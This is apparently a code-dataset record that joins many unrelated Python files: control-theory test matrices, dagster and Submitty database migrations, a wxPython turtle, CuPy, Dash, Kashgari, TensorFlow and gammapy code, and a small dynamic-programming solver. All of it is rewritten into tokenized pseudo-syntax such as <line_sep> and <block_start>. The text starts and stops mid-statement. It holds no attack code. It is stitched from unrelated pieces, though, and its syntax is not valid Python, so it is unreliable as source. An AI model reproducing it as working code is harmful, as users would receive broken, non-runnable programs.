0] [0 0] [0 0] [0 0.4]])) # MIMO system (Atkinson, 1985) (array([[0 1 0] [0 0 1] [-6 -11 -6]]) array([[1 1] [0 1] [1 1]])) # Drum boiler (Bengtsson 1973) (array([[-0.129 0 0.396 0.25 0.00191] [0.0329 0 -0.00779 0.0122 -0.621] [0.00718 0 -0.1 0.000887 -0.0385] [0.00411 0 0 -0.0822 0] [0.00351 0 0.0035 0.00426 -0.0743]]) array([[0 0.1390] [0 0.0359] [0 -0.0989] [0.0249 0] [0 -0.00534]])) # Miminis random example #1 (array([[5.8765 9.3456 4.5634 9.3520] [6.6526 0.5867 3.5829 0.6534] [0.0000 9.6738 7.4876 4.7654] [0.0000 0.0000 6.6784 2.5678]]) array([[3.9878 0.5432] [0.0000 2.7650] [0.0000 0.0000] [0.0000 0.0000]])) # Miminis random example #2 (array([[.5257 .8544 .5596 .5901 .0259 .6213 .7227 .5617] [.9931 .0643 .1249 .3096 .5174 .3455 .8977 .4682] [.6489 .8279 .7279 .2552 .3917 .7065 .2428 .7795] [.9923 .9262 .2678 .6252 .2414 .5211 .4338 .9677] [.0000 .5667 .5465 .1157 .5064 .2870 .7901 .9809] [.0000 .0000 .8672 .6117 .4236 .6503 .5069 .8187] [.0000 .0000 .0000 .0000 .2894 .0881 .5233 .4257] [.0000 .0000 .0000 .0000 .0000 .4499 .5597 .2462]]) array([[0.9230 0.3950 0.8325] [0.0000 0.0366 0.6105] [0.0000 0.0000 0.1871] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000]])) # Aircraft control example I (Kautsky and Nichols 1983) (array([[0 1 0 0] [1.40e-4 -2.04 -1.95 -1.33e-2] [-2.51e-4 1 -1.32 -2.38e-2] [-5.61e-1 0 0.358 -2.79e-1]]) array([[0 0 0] [-5.33 6.45e-3 -2.67e-1] [-1.60e-1 -1.16e-2 -2.51e-1] [0 1.06e-1 8.62e-2]])) # Aircraft control example II (Kautsky and Nichols 1983) (array([[0 1 0 0] [5.32e-7 -4.18e-1 -0.12 -2.32e-2] [-4.62e-9 1 -0.752 -2.39e-2] [-5.61e-1 0 0.3 -1.74e-2]]) array([[0 0] [-1.72e-1 7.45e-6] [-2.82e-2 -7.78e-5] [0 3.69e-3]])) # Symmetric example (Kautsky and Nichols 1983) (array([[-3.624 4.9567e-2 -2.4564e-1 1.3853e-2] [3.3486e-1 -1.8875 -8.1251e-1 -2.8102e-1] [-1.9958e-1 -1.1335 -2.2039 -4.5523e-1] [1.3784e-1 -4.7140e-1 -3.3229e-1 -4.0605]]) array([[2.3122e-1 3.0761e-1 3.6164e-1 3.3217e-1] [8.8339e-1 2.1460e-1 5.6642e-1 5.0153e-1]]).T) # Ad-hoc ill-conditioned example (Byers and Nash 1989) (array([[0 0 0 0] [1 10 100 1000] [0 1 10 100] [0 0 1 10]]) array([[1 0] [0 1] [0 0] [0 0]]))]<line_sep># Return a generator <return>(x<for>x ABs)<block_end><def_stmt>_test_get_pole_reps # Only complex <block_start>p=array([1.+1j 1-1j 2.+1j 2-1j])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>4<assert_stmt>nr<eq>0<line_sep># Only real p=array([1 2 3])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>0<assert_stmt>nr<eq>3<line_sep># Mixed, no reps p=array([1.+1j 1-1j 3])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>2<assert_stmt>nr<eq>1<line_sep># Mixed, complex reps p=array([1.+1j 1-1j 1.+1j 1-1j 3])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[0 2]]))<line_sep>assert_array_equal(pr[1] empty((0 2)))<assert_stmt>nc<eq>4<assert_stmt>nr<eq>1<line_sep># Mixed real reps p=array([1.+1j 1-1j 1. 1])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] empty((0 2)))<line_sep>assert_array_equal(pr[1] array([[2 4]]))<assert_stmt>nc<eq>2<assert_stmt>nr<eq>2<line_sep># Mixed real reps, real dangling p=array([1.+1j 1-1j 1. 
1 0.54 3.8])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] empty((0 2)))<line_sep>assert_array_equal(pr[1] array([[3 5]]))<assert_stmt>nc<eq>2<assert_stmt>nr<eq>4<line_sep># Mixed complex reps, complex dangling p=array([1.+1j 1-1j 1.+1j 1-1j 0.+1j 0-1j 0.5 3.])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[1 3]]))<line_sep>assert_array_equal(pr[1] empty((0 2)))<assert_stmt>nc<eq>6<assert_stmt>nr<eq>2<line_sep># Mixed reps and dangling p=array([1.+1j 1-1j 1.+1j 1-1j 2.+1j 2-1j 3.+1j 3-1j 3.+1j 3-1j 3.+1j 3-1j 4.+1j 4-1j 0 0.5 0.5 3. 6 6 6])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[0 2] [3 6]]))<line_sep>assert_array_equal(pr[1] array([[15 17] [18 21]]))<assert_stmt>nc<eq>14<assert_stmt>nr<eq>7<block_end>
"""0.10.0 create new schedule tables Revision ID: 8ccbed5060b8 Revises: <PASSWORD> Create Date: 2021-01-13 12:56:41.971500 """<import_from_stmt>dagster.core.storage.migration.utils create_0_10_0_schedule_tables<line_sep># revision identifiers, used by Alembic. revision="8ccbed5060b8"<line_sep>down_revision="<PASSWORD>"<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade <block_start>create_0_10_0_schedule_tables()<block_end><def_stmt>downgrade <block_start><pass><block_end>
<import_stmt>wx<import_from_stmt>.misc.helpers deg_to_rad rad_to_deg<import_from_stmt>.misc.vector Vector<line_sep># Size of the turtle canvas. We assume no user will have a screen # so big that the canvas will be bigger than this. BITMAP_SIZE=Vector((2000 1200))<line_sep># Center of the canvas. origin=BITMAP_SIZE/2.0<def_stmt>to_my_angle angle<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>rad_to_deg(-angle)-180<block_end><def_stmt>from_my_angle angle<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>deg_to_rad(-angle+180)<block_end><def_stmt>from_my_pos pos<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>-pos+origin<block_end><def_stmt>to_my_pos pos<block_start>""" Transform between the reference frame that we prefer and the reference frame that wxPython prefers """<line_sep><return>-pos+origin<block_end><class_stmt>Turtle<block_start>""" A Turtle object defines a turtle by its attributes, such as position, orientation, color, etc. See source of __init__ for a complete list. """<def_stmt>__init__ self<block_start>self.pos=Vector((0 0))<line_sep>self.orientation=180<line_sep>self.color="red"<line_sep>self.width=3<line_sep>self.visible=<true><line_sep>self.pen_down=<true><line_sep># the `clear` attribute is only made True momentarily when # the `clear()` function is called by the user to clear the screen. self.clear=<false><line_sep>self.SPEED=400.0# Pixels per second self.ANGULAR_SPEED=360.0<block_end># Degrees per second <def_stmt>give_pen self<block_start>""" Gives a wxPython pen that corresponds to the color, width, and pen_downity of the Turtle instance. """<line_sep><return>wx.Pen(self.color self.width wx.SOLID<if>self.pen_down<else>wx.TRANSPARENT)<block_end><block_end>
# -*- coding: utf-8 -*- # Use this file to easily define all of your cron jobs. # # It's helpful to understand cron before proceeding. # http://en.wikipedia.org/wiki/Cron # # Learn more: http://github.com/fengsp/plan <import_from_stmt>plan Plan<line_sep>cron=Plan("scripts" path='/web/yourproject/scripts' environment={'YOURAPP_ENV':'production'})<line_sep>cron.script('script.py' every='1.day')<line_sep>cron.script('script_2.py' every='1.month' at='hour.12 minute.0')<line_sep># more scripts here <if_stmt>__name__<eq>"__main__"<block_start>cron.run('update')<block_end>
<import_stmt>cupy<import_from_stmt>cupyx jit<line_sep>@jit.rawkernel()<def_stmt>reduction x y size<block_start>tid=jit.threadIdx.x<line_sep>ntid=jit.blockDim.x<line_sep>value=cupy.float32(0)<for_stmt>i range(tid size ntid)<block_start>value<augadd>x[i]<block_end>smem=jit.shared_memory(cupy.float32 1024)<line_sep>smem[tid]=value<line_sep>jit.syncthreads()<if_stmt>tid<eq>cupy.uint32(0)<block_start>value=cupy.float32(0)<for_stmt>i range(ntid)<block_start>value<augadd>smem[i]<block_end>y[0]=value<block_end><block_end>size=cupy.uint32(2<power>22)<line_sep>x=cupy.random.normal(size=(size ) dtype=cupy.float32)<line_sep>y=cupy.empty((1 ) dtype=cupy.float32)<line_sep>reduction[1 1024](x y size)<line_sep>print(y[0])<line_sep>print(x.sum())<line_sep>
<import_stmt>dash<import_stmt>dash_html_components<as>html<import_stmt>flask<import_stmt>os<import_stmt>config<line_sep>STATIC_PREFIX='/{}/static/'.format(config.DASH_APP_NAME)<line_sep>app=dash.Dash()<line_sep># expose the underlying Flask server so the static route below can be registered server=app.server<line_sep>app.layout=html.Div([html.Img(src='{}my-image.png'.format(STATIC_PREFIX))])<line_sep># Static routes for on-premise are a little bit different than local # because the Plotly On-Premise proxy server strips away the app name # before forwarding the request to Dash <if_stmt>'DYNO'<in>os.environ<block_start>static_route='/static/<path:path>'<block_end><else_stmt><block_start>static_route='/{}/static/<path:path>'.format(config.DASH_APP_NAME)<block_end>@server.route(static_route)<def_stmt>serve_static path<block_start>root_dir=os.getcwd()<line_sep><return>flask.send_from_directory(os.path.join(root_dir 'static') path)<block_end>
# encoding: utf-8 # author: BrikerMan # contact: <EMAIL> # blog: https://eliyar.biz # file: abc_embedding.py # time: 2:43 下午 <import_stmt>json<import_from_stmt>typing Dict List Any Optional Union<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_stmt>tqdm<import_stmt>kashgari<import_from_stmt>kashgari.generators CorpusGenerator<import_from_stmt>kashgari.logger logger<import_from_stmt>kashgari.processors ABCProcessor<line_sep>L=tf.keras.layers<class_stmt>ABCEmbedding<block_start><def_stmt>to_dict self<arrow>Dict[str Any]<block_start>config:Dict[str Any]={'segment':self.segment 'embedding_size':self.embedding_size 'max_position':self.max_position **self.kwargs}<line_sep><return>{'__class_name__':self.__class__.__name__ '__module__':self.__class__.__module__ 'config':config 'embed_model':json.loads(self.embed_model.to_json())}<block_end><def_stmt>__init__ self segment:bool=<false> embedding_size:int=100 max_position:int=<none> **kwargs:Any<block_start>self.embed_model:tf.keras.Model=<none><line_sep>self.segment:bool=segment# type: ignore self.kwargs=kwargs<line_sep>self.embedding_size:int=embedding_size# type: ignore self.max_position:int=max_position# type: ignore self.vocab2idx=self.load_embed_vocab()<line_sep>self._text_processor:Optional[ABCProcessor]=<none><block_end><def_stmt>_override_load_model self config:Dict<arrow><none><block_start>embed_model_json_str=json.dumps(config['embed_model'])<line_sep>self.embed_model=tf.keras.models.model_from_json(embed_model_json_str custom_objects=kashgari.custom_objects)<block_end><def_stmt>setup_text_processor self processor:ABCProcessor<arrow><none><block_start>self._text_processor=processor<line_sep>self.build_embedding_model(vocab_size=processor.vocab_size)<line_sep>self._text_processor.segment=self.segment<if_stmt>self.vocab2idx<block_start>self._text_processor.vocab2idx=self.vocab2idx<line_sep>self._text_processor.idx2vocab=dict([(v k)<for>k,v self.vocab2idx.items()])<block_end><block_end><def_stmt>get_seq_length_from_corpus self generators:List[CorpusGenerator] * use_label:bool=<false> cover_rate:float=0.95<arrow>int<block_start>""" Calculate proper sequence length according to the corpus Args: generators: use_label: cover_rate: Returns: """<line_sep>seq_lens=[]<for_stmt>gen generators<block_start><for_stmt>sentence,label tqdm.tqdm(gen desc="Calculating sequence length")<block_start><if_stmt>use_label<block_start>seq_lens.append(len(label))<block_end><else_stmt><block_start>seq_lens.append(len(sentence))<block_end><block_end><block_end><if_stmt>cover_rate<eq>1.0<block_start>target_index=-1<block_end><else_stmt><block_start>target_index=int(cover_rate<times>len(seq_lens))<block_end>sequence_length=sorted(seq_lens)[target_index]<line_sep>logger.debug(f'Calculated sequence length = {sequence_length}')<line_sep><return>sequence_length<block_end><def_stmt>load_embed_vocab self<arrow>Optional[Dict[str int]]<block_start>""" Load vocab dict from embedding layer Returns: vocab dict or None """<line_sep><raise>NotImplementedError<block_end><def_stmt>build_embedding_model self * vocab_size:int=<none> force:bool=<false> **kwargs:Dict<arrow><none><block_start><raise>NotImplementedError<block_end><def_stmt>embed self sentences:List[List[str]] * debug:bool=<false><arrow>np.ndarray<block_start>""" batch embed sentences Args: sentences: Sentence list to embed debug: show debug info Returns: vectorized sentence list """<if_stmt>self._text_processor<is><none><block_start><raise>ValueError('Need to setup the `embedding.setup_text_processor` before 
calling the embed function.')<block_end>tensor_x=self._text_processor.transform(sentences segment=self.segment seq_length=self.max_position)<if_stmt>debug<block_start>logger.debug(f'sentence tensor: {tensor_x}')<block_end>embed_results=self.embed_model.predict(tensor_x)<line_sep><return>embed_results<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start><pass><block_end>
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functions for querying registered kernels."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>tensorflow.core.framework kernel_def_pb2<import_from_stmt>tensorflow.python pywrap_tensorflow<as>c_api<import_from_stmt>tensorflow.python.util compat<def_stmt>get_all_registered_kernels <block_start>"""Returns a KernelList proto of all registered kernels. """<line_sep>buf=c_api.TF_GetAllRegisteredKernels()<line_sep>data=c_api.TF_GetBuffer(buf)<line_sep>kernel_list=kernel_def_pb2.KernelList()<line_sep>kernel_list.ParseFromString(compat.as_bytes(data))<line_sep><return>kernel_list<block_end><def_stmt>get_registered_kernels_for_op name<block_start>"""Returns a KernelList proto of registered kernels for a given op. Args: name: A string representing the name of the op whose kernels to retrieve. """<line_sep>buf=c_api.TF_GetRegisteredKernelsForOp(name)<line_sep>data=c_api.TF_GetBuffer(buf)<line_sep>kernel_list=kernel_def_pb2.KernelList()<line_sep>kernel_list.ParseFromString(compat.as_bytes(data))<line_sep><return>kernel_list<block_end>
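# Hedged usage sketch (assumption: "MatMul" is only an illustrative op name; any registered op name works) <if_stmt>__name__<eq>"__main__"<block_start>matmul_kernels=get_registered_kernels_for_op("MatMul")<for_stmt>kernel matmul_kernels.kernel<block_start>print(kernel.op kernel.device_type)<block_end><block_end>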
# Licensed under a 3-clause BSD style license - see LICENSE.rst """Unit tests for the Fit class"""<import_stmt>pytest<import_from_stmt>numpy.testing assert_allclose<import_from_stmt>astropy.table Table<import_from_stmt>gammapy.datasets Dataset<import_from_stmt>gammapy.modeling Fit Parameter<import_from_stmt>gammapy.modeling.models Model Models<import_from_stmt>gammapy.utils.testing requires_dependency<line_sep>pytest.importorskip("iminuit")<class_stmt>MyModel(Model)<block_start>x=Parameter("x" 2)<line_sep>y=Parameter("y" 3e2)<line_sep>z=Parameter("z" 4e-2)<line_sep>name="test"<line_sep>datasets_names=["test"]<line_sep>type="model"<block_end><class_stmt>MyDataset(Dataset)<block_start>tag="MyDataset"<def_stmt>__init__ self name="test"<block_start>self._name=name<line_sep>self._models=Models([MyModel(x=1.99 y=2.99e3 z=3.99e-2)])<line_sep>self.data_shape=(1 )<line_sep>self.meta_table=Table()<block_end>@property<def_stmt>models self<block_start><return>self._models<block_end><def_stmt>stat_sum self# self._model.parameters = parameters <block_start>x,y,z=[p.value<for>p self.models.parameters]<line_sep>x_opt,y_opt,z_opt=2 3e2 4e-2<line_sep><return>(x-x_opt)<power>2+(y-y_opt)<power>2+(z-z_opt)<power>2<block_end><def_stmt>fcn self<block_start>x,y,z=[p.value<for>p self.models.parameters]<line_sep>x_opt,y_opt,z_opt=2 3e5 4e-5<line_sep>x_err,y_err,z_err=0.2 3e4 4e-6<line_sep><return>(((x-x_opt)/x_err)<power>2+((y-y_opt)/y_err)<power>2+((z-z_opt)/z_err)<power>2)<block_end><def_stmt>stat_array self<block_start>"""Statistic array, one value per data point."""<block_end><block_end>@requires_dependency("iminuit")@requires_dependency("sherpa")@pytest.mark.parametrize("backend" ["sherpa" "scipy"])<def_stmt>test_optimize_backend_and_covariance backend<block_start>dataset=MyDataset()<if_stmt>backend<eq>"scipy"<block_start>kwargs={"method":"L-BFGS-B"}<block_end><else_stmt><block_start>kwargs={}<block_end>kwargs["backend"]=backend<line_sep>fit=Fit(optimize_opts=kwargs)<line_sep>result=fit.run([dataset])<line_sep>result=result["optimize_result"]<line_sep>pars=result.parameters<line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-2)<line_sep>assert_allclose(pars["x"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["y"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["z"].error 1 rtol=1e-7)<line_sep>correlation=dataset.models.covariance.correlation<line_sep>assert_allclose(correlation[0 1] 0 atol=1e-7)<line_sep>assert_allclose(correlation[0 2] 0 atol=1e-7)<line_sep>assert_allclose(correlation[1 2] 0 atol=1e-7)<block_end>@pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_run backend<block_start>dataset=MyDataset()<line_sep>fit=Fit(backend=backend)<line_sep>result=fit.run([dataset])<line_sep>result=result["optimize_result"]<line_sep>pars=result.parameters<assert_stmt>result.success<is><true><line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-3)<line_sep>assert_allclose(pars["x"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["y"].error 1 rtol=1e-7)<line_sep>assert_allclose(pars["z"].error 1 rtol=1e-7)<line_sep>correlation=dataset.models.covariance.correlation<line_sep>assert_allclose(correlation[0 1] 0 atol=1e-7)<line_sep>assert_allclose(correlation[0 2] 0 atol=1e-7)<line_sep>assert_allclose(correlation[1 2] 0 
atol=1e-7)<block_end>@requires_dependency("sherpa")@pytest.mark.parametrize("backend" ["minuit" "sherpa" "scipy"])<def_stmt>test_optimize backend<block_start>dataset=MyDataset()<if_stmt>backend<eq>"scipy"<block_start>kwargs={"method":"L-BFGS-B"}<block_end><else_stmt><block_start>kwargs={}<block_end>fit=Fit(store_trace=<true> backend=backend optimize_opts=kwargs)<line_sep>result=fit.optimize([dataset])<line_sep>pars=dataset.models.parameters<assert_stmt>result.success<is><true><line_sep>assert_allclose(result.total_stat 0 atol=1)<line_sep>assert_allclose(pars["x"].value 2 rtol=1e-3)<line_sep>assert_allclose(pars["y"].value 3e2 rtol=1e-3)<line_sep>assert_allclose(pars["z"].value 4e-2 rtol=1e-2)<assert_stmt>len(result.trace)<eq>result.nfev<block_end># TODO: add some extra covariance tests, in addition to run # Probably mainly if error message is OK if optimize didn't run first. # def test_covariance(): @pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_confidence backend<block_start>dataset=MyDataset()<line_sep>fit=Fit(backend=backend)<line_sep>fit.optimize([dataset])<line_sep>result=fit.confidence(datasets=[dataset] parameter="x")<assert_stmt>result["success"]<is><true><line_sep>assert_allclose(result["errp"] 1)<line_sep>assert_allclose(result["errn"] 1)<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<block_end>@pytest.mark.parametrize("backend" ["minuit"])<def_stmt>test_confidence_frozen backend<block_start>dataset=MyDataset()<line_sep>dataset.models.parameters["x"].frozen=<true><line_sep>fit=Fit(backend=backend)<line_sep>fit.optimize([dataset])<line_sep>result=fit.confidence(datasets=[dataset] parameter="y")<assert_stmt>result["success"]<is><true><line_sep>assert_allclose(result["errp"] 1)<line_sep>assert_allclose(result["errn"] 1)<block_end><def_stmt>test_stat_profile <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>dataset.models.parameters["x"].scan_n_values=3<line_sep>result=fit.stat_profile(datasets=[dataset] parameter="x")<line_sep>assert_allclose(result["x_scan"] [0 2 4] atol=1e-7)<line_sep>assert_allclose(result["stat_scan"] [4 0 4] atol=1e-7)<assert_stmt>len(result["fit_results"])<eq>0<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<block_end><def_stmt>test_stat_profile_reoptimize <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>dataset.models.parameters["y"].value=0<line_sep>dataset.models.parameters["x"].scan_n_values=3<line_sep>result=fit.stat_profile(datasets=[dataset] parameter="x" reoptimize=<true>)<line_sep>assert_allclose(result["x_scan"] [0 2 4] atol=1e-7)<line_sep>assert_allclose(result["stat_scan"] [4 0 4] atol=1e-7)<line_sep>assert_allclose(result["fit_results"][0].total_stat result["stat_scan"][0] atol=1e-7)<block_end><def_stmt>test_stat_surface <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>x_values=[1 2 3]<line_sep>y_values=[2e2 3e2 4e2]<line_sep>dataset.models.parameters["x"].scan_values=x_values<line_sep>dataset.models.parameters["y"].scan_values=y_values<line_sep>result=fit.stat_surface(datasets=[dataset] x="x" y="y")<line_sep>assert_allclose(result["x_scan"] x_values atol=1e-7)<line_sep>assert_allclose(result["y_scan"] y_values atol=1e-7)<line_sep>expected_stat=[[1.0001e04 1.0000e00 1.0001e04] [1.0000e04 0.0000e00 1.0000e04] [1.0001e04 1.0000e00 1.0001e04] 
]<line_sep>assert_allclose(list(result["stat_scan"]) expected_stat atol=1e-7)<assert_stmt>len(result["fit_results"])<eq>0<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["x"].value 2)<line_sep>assert_allclose(dataset.models.parameters["y"].value 3e2)<block_end><def_stmt>test_stat_surface_reoptimize <block_start>dataset=MyDataset()<line_sep>fit=Fit()<line_sep>fit.run([dataset])<line_sep>x_values=[1 2 3]<line_sep>y_values=[2e2 3e2 4e2]<line_sep>dataset.models.parameters["z"].value=0<line_sep>dataset.models.parameters["x"].scan_values=x_values<line_sep>dataset.models.parameters["y"].scan_values=y_values<line_sep>result=fit.stat_surface(datasets=[dataset] x="x" y="y" reoptimize=<true>)<line_sep>assert_allclose(result["x_scan"] x_values atol=1e-7)<line_sep>assert_allclose(result["y_scan"] y_values atol=1e-7)<line_sep>expected_stat=[[1.0001e04 1.0000e00 1.0001e04] [1.0000e04 0.0000e00 1.0000e04] [1.0001e04 1.0000e00 1.0001e04] ]<line_sep>assert_allclose(list(result["stat_scan"]) expected_stat atol=1e-7)<line_sep>assert_allclose(result["fit_results"][0][0].total_stat result["stat_scan"][0][0] atol=1e-7)<block_end><def_stmt>test_stat_contour <block_start>dataset=MyDataset()<line_sep>dataset.models.parameters["x"].frozen=<true><line_sep>fit=Fit(backend="minuit")<line_sep>fit.optimize([dataset])<line_sep>result=fit.stat_contour(datasets=[dataset] x="y" y="z")<assert_stmt>result["success"]<is><true><line_sep>x=result["y"]<line_sep>assert_allclose(len(x) 10)<line_sep>assert_allclose(x[0] 299 rtol=1e-5)<line_sep>assert_allclose(x[-1] 299.292893 rtol=1e-5)<line_sep>y=result["z"]<line_sep>assert_allclose(len(y) 10)<line_sep>assert_allclose(y[0] 0.04 rtol=1e-5)<line_sep>assert_allclose(y[-1] 0.747107 rtol=1e-5)<line_sep># Check that original value state wasn't changed assert_allclose(dataset.models.parameters["y"].value 300)<block_end>
# Java locale differences from JDK 9 onwards, and locale variation on # developer machines, break test_strptime tests. This manifests more on Windows. # Rather than diverge from the Python source, this overrides with extra locale # setup. # Merging back into CPython is desirable, but is a bigger discussion around # library merging generally. <import_stmt>unittest<import_from_stmt>datetime datetime<import_from_stmt>time strptime<import_from_stmt>test.test_strptime *<import_from_stmt>test test_support<class_stmt>ParsingTests(unittest.TestCase)<block_start><def_stmt>test_iso8601 self<block_start>now=datetime.utcnow().replace(microsecond=0)<line_sep>self.assertEqual(now datetime.strptime(now.isoformat('T') "%Y-%m-%dT%H:%M:%S"))<line_sep># tests bug 1662 self.assertEqual(now datetime.strptime(now.isoformat('T')+'Z' "%Y-%m-%dT%H:%M:%SZ"))<block_end><def_stmt>test_IllegalArgument_to_ValueError self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>d=strptime('' '%e')<block_end><block_end><def_stmt>test_issue1964 self<block_start>d=strptime('0' '%f')<line_sep>self.assertEqual(1900 d.tm_year)<block_end><def_stmt>test_issue2112 self<block_start>d=strptime('1' '%d')<line_sep>self.assertEqual(1900 d.tm_year)<block_end><block_end><def_stmt>test_main initialize=<true><block_start>test_support.force_reset_locale(initialize)<line_sep>test_support.run_unittest(getlang_Tests LocaleTime_Tests TimeRETests StrptimeTests Strptime12AMPMTests JulianTests CalculationTests CacheTests ParsingTests)<block_end><if_stmt>__name__<eq>'__main__'<block_start>test_main(initialize=<false>)<block_end>
''' @author: <NAME> Filling one cell: O(1) Filling all cells: O(2xn) = O(n) '''<def_stmt>find_maximum_cost Y<block_start>values=[[0<for>_ range(2)]<for>_ range(len(Y))]<line_sep># values[i][0]: best total so far if position i is set to 1; values[i][1]: if it is set to Y[i] i=1<while_stmt>i<l>len(Y)# the previous position contributes either its lowest value (1) or its highest (Y[i-1]) <block_start>values[i][0]=max(values[i-1][0] values[i-1][1]+Y[i-1]-1)<line_sep>values[i][1]=max(values[i-1][1]+abs(Y[i]-Y[i-1]) values[i-1][0]+Y[i]-1)<line_sep>i<augadd>1<line_sep>#print(values) <block_end><return>max(values[len(Y)-1][0] values[len(Y)-1][1])<block_end><def_stmt>main <block_start>Y=[5 6 8 13 9]<line_sep>cost=find_maximum_cost(Y)<line_sep>print(cost)<line_sep># Output: 34 <block_end>main()<line_sep>
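# Hedged cross-check sketch (assumptions: the task is to choose each position's value from 1..Y[i] so that the sum of absolute adjacent differences is maximal, and only the endpoints 1 and Y[i] ever need to be tried) <import_from_stmt>itertools product<def_stmt>brute_force Y<block_start>best=0<for_stmt>bits product((0 1) repeat=len(Y))<block_start>vals=[1<if>b<eq>0<else>y<for>b,y zip(bits Y)]<line_sep>best=max(best sum(abs(a-b)<for>a,b zip(vals vals[1:])))<block_end><return>best<block_end><assert_stmt>brute_force([5 6 8 13 9])<eq>find_maximum_cost([5 6 8 13 9])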
"""Migration for a given Submitty course database."""<def_stmt>up config database semester course<block_start>""" Run up migration. :param config: Object holding configuration details about Submitty :type config: migrator.config.Config :param database: Object for interacting with given database for environment :type database: migrator.db.Database :param semester: Semester of the course being migrated :type semester: str :param course: Code of course being migrated :type course: str """<line_sep># Create overall comment table database.execute(""" CREATE TABLE IF NOT EXISTS gradeable_data_overall_comment ( goc_id integer NOT NULL, g_id character varying(255) NOT NULL, goc_user_id character varying(255), goc_team_id character varying(255), goc_grader_id character varying(255) NOT NULL, goc_overall_comment character varying NOT NULL, CONSTRAINT goc_user_team_id_check CHECK (goc_user_id IS NOT NULL OR goc_team_id IS NOT NULL) ); """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_pkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_pkey PRIMARY KEY (goc_id); """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_g_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_g_id_fkey FOREIGN KEY (g_id) REFERENCES gradeable(g_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_user_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_user_id_fkey FOREIGN KEY (goc_user_id) REFERENCES users(user_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_team_id_fkey")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_team_id_fkey FOREIGN KEY (goc_team_id) REFERENCES gradeable_teams(team_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_grader_id")<line_sep>database.execute(""" ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_goc_grader_id FOREIGN KEY (goc_grader_id) REFERENCES users(user_id) ON DELETE CASCADE; """)<line_sep>database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_user_unique")<line_sep>database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD 